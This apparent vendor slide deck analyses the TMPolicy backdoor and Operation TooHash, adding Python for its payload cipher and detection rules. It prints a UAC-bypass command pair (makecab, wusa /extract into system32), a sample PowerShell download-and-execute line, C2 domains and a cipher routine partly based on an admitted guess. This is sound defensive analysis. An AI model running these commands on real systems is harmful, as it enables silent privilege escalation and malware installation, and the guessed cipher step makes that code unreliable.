© 2016 Verint systems inc. All rights reserved worldwide

Low visibility of cyber threats
• Invisible attacks: VPN, AD, PtH (pass-the-hash), PtT (pass-the-ticket)
• Invisible network traffic: Google Drive, Dropbox
• Invisible malware: Task Scheduler, WMI, PowerShell

Fileless malware attacks
• Script-based and fileless malware has begun to increase dramatically, and PowerShell can be embedded in a macro and then into a document file in various forms.
• PowerShell and WMI are both built into Windows and are routinely used in post-exploitation, so fileless threats will only become more common.

You can install the back door in one PowerShell line
• One compact PowerShell line achieves three things:
  • Detect the architecture by checking the size of the IntPtr type (4 bytes on x86, 8 bytes on x64).
  • Download a binary from a website.
  • Run it directly on the fly with Invoke-Expression (iex), which runs commands or expressions on the local computer.

Import a self-signed certificate to bypass the signature check
• The malicious program is self-signed, but the attacker added that certificate to the victim's trusted root store, so on the victim machine the signature always verifies as valid.

Sample_NICT.rar overview
• TMPolicy (2).dll pretends to be msisip.dll; its PDB path is F:\MyProject\msisip\Release\NvSmartMax.pdb.
• Its DLL entry point and every exported API do only one thing: WinExec("tmpolicy.dll", 0).
• TMPolicy (1).dll has the original name tmpolicy.dll; it is actually a PE file (tmpolicy.dll).

TMPolicy sample overview
• The malware determines whether it is running on 32-bit or 64-bit Windows and generates a different payload DLL for each to bypass the security check.
• On Windows XP it drops srvlic.dll + a "fake" file.
• On Windows 7 it drops msTracer.dll + a "fake" file.
• The fake file is actually the real backdoor module and is usually dropped to the directory C:\Documents and Settings\All Users\Application Data\Windows CE\.
• C2 connections:
  • help.adobeservice.net:80; help.adobeservice.net:8080
  • assist.adobeservice.net:443; assist.adobeservice.net:1863

Running on x86 Windows XP
• How does C:\WINDOWS\system32\srvlic.dll get executed?
• One of the svchost.exe instances loads srvsvc.dll, and srvsvc.dll tries to load srvlic.dll when LoadLicensingLibrary() is called.
• C:\Windows\system32\srvlic.dll does not exist on a clean system, so the fake srvlic.dll gets loaded through DLL side-loading / path hijacking: the dropper simply supplies the file the service already asks for.
• When srvlic.dll is loaded, it reads the file "fake" and decrypts it into a module (PE) file.
• The decrypted fake file is copied into a newly allocated memory block rather than loaded through the normal loader, so the backdoor module cannot be observed in Process Explorer.

[Screenshot slides: the DLL file has been mapped into memory blocks]

Running on x64 Windows 7 (1/2)
• Running TMPolicy.exe:
  1. Drops the file C:\ProgramData\temp0 and moves it to C:\Users\\AppData\Local\Temp\msTracer.dll.
  2. Moves C:\Users\\AppData\Local\Temp\msTracer.dll to C:\Windows\system32 (in theory it cannot be moved to this path, because UAC restricts it).
  3. When msTracer.dll is loaded, it reads the file C:\ProgramData\Windows CE\fake and decrypts it into a module file.
  4. Creates a batch file to delete all the files left behind.

Running on x64 Windows 7 (2/2)
• SearchIndexer.exe is the Windows Search service (WSearch). When loadTracerDLL is called it tries to load msfte.dll, and if that fails it falls back to loading msTracer.dll.
• SearchProtocolHost.exe has the same DLL side-loading weakness.
• When msTracer.dll is loaded, it reads the file "fake" and decrypts it into a module file.
Bypass UAC on Windows 7 (1/3)
• TMPolicy.exe cannot move msTracer.dll into system32 directly, because that directory is protected by UAC.
• So how does it place files in a system-protected area without triggering a UAC prompt?

Bypass UAC on Windows 7 (2/3)
• It uses the wusa.exe method (see https://github.com/hfiref0x/UACME) to get around the UAC restriction:
  makecab.exe /V1 "C:\Users\\AppData\Local\Temp\msTracer.dll" "C:\Users\\AppData\Local\Temp\msTracer.dll.msu"
  wusa.exe /quiet "C:\Users\\AppData\Local\Temp\\msTracer.dll.msu" /extract:C:\Windows\system32

Bypass UAC on Windows 7 (3/3)
• wusa.exe is the Windows Update Standalone Installer, a Microsoft-signed binary that auto-elevates without a prompt; its /extract switch unpacks the .msu into the target directory with that elevated token, so the DLL lands in system32 silently.
• The wusa method works from Windows 7 up to Windows 10 TH1 build 10136; later Windows 10 builds removed wusa's /extract switch, which closes this path.

Encryption/decryption of fake (1/4)
• Each run of TMPolicy.exe generates a different fake file, but after decryption the contents are all the same.
• Fake file content = 4-byte secret key + encrypted content.
• The secret key is generated by the C rand() function.

Encryption/decryption of fake (2/4)
• Secret key: the first 4 bytes of the file.
• Cipher = ENCRYPT(Plain, Secret_Key)
• Plain = DECRYPT(Cipher, Secret_Key)
• Reduced sequence: a fixed 128-byte table.

reduced_sequence = [
    0x03, 0x05, 0x06, 0x07, 0x0A, 0x0C, 0x0E, 0x13, 0x14, 0x18, 0x1B, 0x1C, 0x21, 0x25, 0x26, 0x27,
    0x28, 0x29, 0x2B, 0x2D, 0x2F, 0x30, 0x33, 0x35, 0x36, 0x37, 0x38, 0x3F, 0x41, 0x42, 0x45, 0x47,
    0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x50, 0x52, 0x53, 0x55, 0x56, 0x57, 0x5A, 0x5B, 0x5D, 0x5E, 0x60,
    0x61, 0x65, 0x66, 0x67, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x70, 0x73, 0x77, 0x7D, 0x7E, 0x7F,
    0x82, 0x83, 0x84, 0x8A, 0x8E, 0x91, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x9A, 0x9B, 0x9C, 0xA0,
    0xA1, 0xA3, 0xA4, 0xA6, 0xA7, 0xAA, 0xAB, 0xAC, 0xAE, 0xAF, 0xB1, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7,
    0xBA, 0xBC, 0xBF, 0xC0, 0xC2, 0xC9, 0xCA, 0xCB, 0xCC, 0xCE, 0xD1, 0xD2, 0xD4, 0xD6, 0xD8, 0xD9,
    0xDA, 0xDB, 0xDC, 0xE0, 0xE5, 0xE6, 0xE9, 0xED, 0xEE, 0xF3, 0xF5, 0xF7, 0xFA, 0xFB, 0xFC, 0xFE,
]

Encryption/decryption of fake (3/4)
1. Calculate the chosen sequence (4 bytes):
   chosen_sequence[i] = reduced_sequence[secret_key[i] % 128], for i = 0..3
2. Build the first secret map (256 bytes):
   first_secret_map = [0, 1, 2, ..., 255]
3. Apply chosen_sequence[0] .. chosen_sequence[3]:
   first_secret_map is rearranged four times, once with each of the four chosen bytes.
4. Build the second secret map (256 bytes) as the inverse permutation of the first:
   second_secret_map[first_secret_map[i]] = i

Encryption/decryption of fake (4/4)
• Encryption is a byte substitution through second_secret_map:
  encrypted_data[i] = second_secret_map[original_data[i]]
• Decryption is the substitution through the reversed map:
  reversed_second_secret_map[second_secret_map[i]] = i
  decrypted_data[i] = reversed_second_secret_map[encrypted_data[i]]
• Since second_secret_map is the inverse of first_secret_map, reversed_second_secret_map is first_secret_map itself. The whole scheme is a keyed monoalphabetic byte substitution: only the 4-byte key changes between runs, which is why every fake file hashes differently yet decrypts to the same module.

Operation TooHash (H2)
• On 03/11/2014 G DATA SecurityLabs reported a spyware campaign, Operation TooHash: a targeted attack on companies and organizations that aims to steal sensitive information from the targets, using a spear-phishing approach.
• Samples from 2013 to 2014-01-06 (MD5, lure filename):
  • 8d263d5dae035e3d97047171e1cbf841 (102年尾牙、103年春酒精緻菜單.xls; "year 102 year-end party and year 103 spring banquet menu", ROC years 102/103 = 2013/2014)
  • 7251073c67db6421049ee2baf4f31b62 (李辉简历.doc; "Li Hui résumé")
  • 2ec306ef507402037e9c1eeb81276152 (文件列表.xls; "file list")
  • 6b83319cf336179f2105999fe586242c (Wo.doc)
• C2: *.cnnic-micro.com, *.adobeservice.net, *.intarnetservice.com, etc.

Indicators of the new Operation TooHash
• Hash values: 650C58E995A471FA4BE6C49A32F7899B, 4DBD68D3741D46170D2585AAE4336B80
• IP address
• Domain names: help.adobeservice.net
• Network/host artifacts: the en/decode algorithm and strings; the connection protocol and User-Agent
• Tools: TMPolicy.exe
• TTPs: spear-phishing e-mail; UAC bypass via wusa.exe; deployment through anti-virus software; DLL side-loading
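The fake-file scheme from the four "Encryption/decryption of fake" slides, re-implemented as an added Python example; this is not the slides' code and not code lifted from the TMPolicy sample. The 128-byte table is the one on the slide and the key/map construction follows the steps above. The slides do not say how first_secret_map is rearranged, so the keyed swap pass `_rearrange` is an assumption standing in for that routine; `encrypt_fake`, `decrypt_fake` and `is_pe_module` are names chosen here. The example also makes explicit a point the slides leave implicit: reversed_second_secret_map is first_secret_map itself.

```python
"""Re-implementation of the TMPolicy "fake" file substitution cipher.

Added example, not code from the Verint slides or from the TMPolicy sample.
Layout of the fake file (from the slides): 4-byte secret key || ciphertext.
Each key byte selects one entry of the 128-byte reduced sequence; the four
chosen bytes drive four rearrangements of an identity table (first_secret_map),
whose inverse (second_secret_map) is the encryption substitution table.

ASSUMPTION: the slides do not say how first_secret_map is rearranged, so
_rearrange() below is a stand-in (an RC4-KSA-style keyed swap pass). Replace
it with the routine recovered from the dropper; everything else follows the slides.
"""
import os

# 128-byte reduced sequence, copied from the slide.
REDUCED_SEQUENCE = [
    0x03, 0x05, 0x06, 0x07, 0x0A, 0x0C, 0x0E, 0x13, 0x14, 0x18, 0x1B, 0x1C, 0x21, 0x25, 0x26, 0x27,
    0x28, 0x29, 0x2B, 0x2D, 0x2F, 0x30, 0x33, 0x35, 0x36, 0x37, 0x38, 0x3F, 0x41, 0x42, 0x45, 0x47,
    0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x50, 0x52, 0x53, 0x55, 0x56, 0x57, 0x5A, 0x5B, 0x5D, 0x5E, 0x60,
    0x61, 0x65, 0x66, 0x67, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x70, 0x73, 0x77, 0x7D, 0x7E, 0x7F,
    0x82, 0x83, 0x84, 0x8A, 0x8E, 0x91, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x9A, 0x9B, 0x9C, 0xA0,
    0xA1, 0xA3, 0xA4, 0xA6, 0xA7, 0xAA, 0xAB, 0xAC, 0xAE, 0xAF, 0xB1, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7,
    0xBA, 0xBC, 0xBF, 0xC0, 0xC2, 0xC9, 0xCA, 0xCB, 0xCC, 0xCE, 0xD1, 0xD2, 0xD4, 0xD6, 0xD8, 0xD9,
    0xDA, 0xDB, 0xDC, 0xE0, 0xE5, 0xE6, 0xE9, 0xED, 0xEE, 0xF3, 0xF5, 0xF7, 0xFA, 0xFB, 0xFC, 0xFE,
]


def chosen_sequence(secret_key):
    """Step 1: chosen_sequence[i] = reduced_sequence[secret_key[i] % 128]."""
    if len(secret_key) != 4:
        raise ValueError("secret key must be exactly 4 bytes")
    return [REDUCED_SEQUENCE[b % 128] for b in secret_key]


def _rearrange(table, c):
    """ASSUMED stand-in for the slides' unspecified rearrangement step.

    One RC4-KSA-style keyed swap pass over the 256-entry table. Any sequence
    of swaps keeps the table a permutation, which is the only property the
    rest of the scheme relies on.
    """
    j = 0
    for i in range(256):
        j = (j + table[i] + c) & 0xFF
        table[i], table[j] = table[j], table[i]


def build_maps(secret_key):
    """Steps 2-4: derive first_secret_map and its inverse second_secret_map."""
    first = list(range(256))
    for c in chosen_sequence(secret_key):      # rearranged four times
        _rearrange(first, c)
    second = [0] * 256
    for i, v in enumerate(first):              # second[first[i]] = i
        second[v] = i
    return first, second


def encrypt_fake(plain, secret_key=None):
    """Produce a fake file: 4-byte key || byte-substituted payload.

    The dropper draws the key from rand() on every run, which is why each run
    yields a fake file with a different hash but identical plaintext.
    """
    if secret_key is None:
        secret_key = os.urandom(4)
    _, second = build_maps(secret_key)
    return bytes(secret_key) + bytes(second[b] for b in plain)


def decrypt_fake(fake):
    """Split key || ciphertext, invert second_secret_map, substitute back."""
    if len(fake) < 4:
        raise ValueError("fake file too short to hold a 4-byte key")
    secret_key, cipher = fake[:4], fake[4:]
    first, second = build_maps(secret_key)
    reversed_second = [0] * 256
    for i, v in enumerate(second):             # reversed[second[i]] = i
        reversed_second[v] = i
    # The inverse of an inverse is the original: decryption is just first_secret_map.
    assert reversed_second == first
    return bytes(reversed_second[b] for b in cipher)


def is_pe_module(blob):
    """Analyst sanity check: the decrypted fake should be a PE (DLL) image."""
    return blob[:2] == b"MZ"


if __name__ == "__main__":
    # Constructed stand-in payload: a fake PE header plus every byte value once.
    payload = b"MZ\x90\x00" + bytes(range(256))
    fake_a = encrypt_fake(payload)
    fake_b = encrypt_fake(payload)
    print("keys differ per run:", fake_a[:4].hex(), fake_b[:4].hex())
    print("both decrypt to the same PE:",
          decrypt_fake(fake_a) == decrypt_fake(fake_b) == payload,
          is_pe_module(decrypt_fake(fake_a)))
```

Run it directly to see two fake files with different keys decrypt to the same payload, the behaviour the (1/4) slide describes. Against a real sample, read the dropped file into `decrypt_fake`, check `is_pe_module` on the result, and if the header does not come out as MZ the assumed `_rearrange` is the piece to replace with the routine from the dropper; the key split, table lookup and inverse-map logic stay as the slides give them.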
Automated & orchestrated cyber intelligence
[Diagram: machine-readable threat intelligence; organizations not able to generate IOCs vs. organizations able to generate IOCs; closed threat intelligence (organization)]
• Comprehensive = active + passive monitoring
• Multiple dimensions = network + endpoint forensics + file analysis
• Automated analysis = intelligence-oriented analysis + machine learning
• Visualization = unified investigation platform
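The indicator slide lists the TTPs (UAC bypass via wusa.exe, DLL side-loading, the one-line PowerShell downloader) but not how to hunt for them. As an added example, not from the slides, the G DATA report or the TMPolicy sample, the rules below turn the concrete commands and paths on the UAC-bypass, side-loading and PowerShell slides into checks over process-creation and file-creation events. The event shape (dicts with `type`, `image`, `cmdline`, `path`), the rule names and every record in `SAMPLE_EVENTS` (including the `bob` user and the `example.invalid` URLs) are constructed for this example.

```python
"""Hunting rules for the TTPs on the TooHash indicator slide.

Added example, not from the slides, the G DATA report, or the TMPolicy sample.
Events are plain dicts in the shape you would get after parsing a Sysmon
process-creation / file-creation feed; the field names ("type", "image",
"cmdline", "path") and SAMPLE_EVENTS below are constructed for this example.
"""
import re

PROTECTED_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")
SIDELOAD_NAMES = ("srvlic.dll", "mstracer.dll", "msfte.dll")   # names from the slides
PS_MARKERS = (r"\[intptr\]::size",            # architecture check
              r"download(string|file|data)",  # fetch from a website
              r"\b(iex|invoke-expression)\b")  # run it on the fly

# Constructed sample telemetry (not real logs). Events 1-5 replay the slides'
# chain; 6 is a benign wusa update install; 7 is an unrelated document write.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\makecab.exe",
     "cmdline": r'makecab.exe /V1 "C:\Users\bob\AppData\Local\Temp\msTracer.dll" "C:\Users\bob\AppData\Local\Temp\msTracer.dll.msu"'},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\wusa.exe",
     "cmdline": r'wusa.exe /quiet "C:\Users\bob\AppData\Local\Temp\msTracer.dll.msu" /extract:C:\Windows\system32'},
    {"id": 3, "type": "file", "path": r"C:\ProgramData\Windows CE\fake"},
    {"id": 4, "type": "file", "path": r"C:\Windows\System32\msTracer.dll"},
    {"id": 5, "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"if([IntPtr]::Size -eq 4){$u='http://example.invalid/a32'}"
                "else{$u='http://example.invalid/a64'};iex (New-Object Net.WebClient).DownloadString($u)\""},
    {"id": 6, "type": "process", "image": r"C:\Windows\System32\wusa.exe",
     "cmdline": r'wusa.exe "C:\Users\bob\Downloads\Windows6.1-KB0000000-x64.msu" /quiet /norestart'},
    {"id": 7, "type": "file", "path": r"C:\Users\bob\Documents\report.docx"},
]


def _norm(s):
    return s.lower()


def rule_wusa_extract(ev):
    """wusa.exe /extract:<dir> with <dir> under a protected directory (the UACME wusa method)."""
    if ev["type"] != "process" or not _norm(ev["image"]).endswith("\\wusa.exe"):
        return False
    m = re.search(r'/extract:"?([^"\s]+)', ev["cmdline"], re.I)
    return m is not None and _norm(m.group(1)).startswith(PROTECTED_DIRS)


def rule_makecab_msu(ev):
    """makecab.exe wrapping a .dll into a .msu: the staging step before wusa /extract."""
    if ev["type"] != "process" or not _norm(ev["image"]).endswith("\\makecab.exe"):
        return False
    c = _norm(ev["cmdline"])
    return ".dll" in c and ".msu" in c


def rule_ps_oneliner(ev):
    """All three parts of the slide's one-liner in a single PowerShell command line:
    IntPtr size check, a download call, and Invoke-Expression/iex."""
    if ev["type"] != "process" or "powershell" not in _norm(ev["image"]):
        return False
    c = _norm(ev["cmdline"])
    return all(re.search(p, c) for p in PS_MARKERS)


def rule_sideload_drop(ev):
    """A write of one of the side-loaded DLL names into a protected directory,
    or of the encrypted 'fake' payload under a Windows CE directory."""
    if ev["type"] != "file":
        return False
    p = _norm(ev["path"])
    directory, _, name = p.rpartition("\\")
    return ((name in SIDELOAD_NAMES and directory.startswith(PROTECTED_DIRS))
            or p.endswith("\\windows ce\\fake"))


RULES = {
    "wusa_extract": rule_wusa_extract,
    "makecab_msu": rule_makecab_msu,
    "ps_oneliner": rule_ps_oneliner,
    "sideload_drop": rule_sideload_drop,
}


def hunt(events):
    """Return (rule_name, event_id) for every rule that fires on every event."""
    return [(name, ev["id"]) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, eid in hunt(SAMPLE_EVENTS):
        print(f"{name:14s} -> event {eid}")
```

The benign wusa install (event 6) does not fire because the rule keys on `/extract:` into a protected directory, not on wusa.exe itself, and a plain update carries no such switch. In production, correlate `makecab_msu` and `wusa_extract` on the shared .msu path and on time, and feed `sideload_drop` from file-creation telemetry, since the side-loaded name alone (a file that does not exist on a clean system) is the whole trick the srvlic.dll and msTracer.dll slides describe.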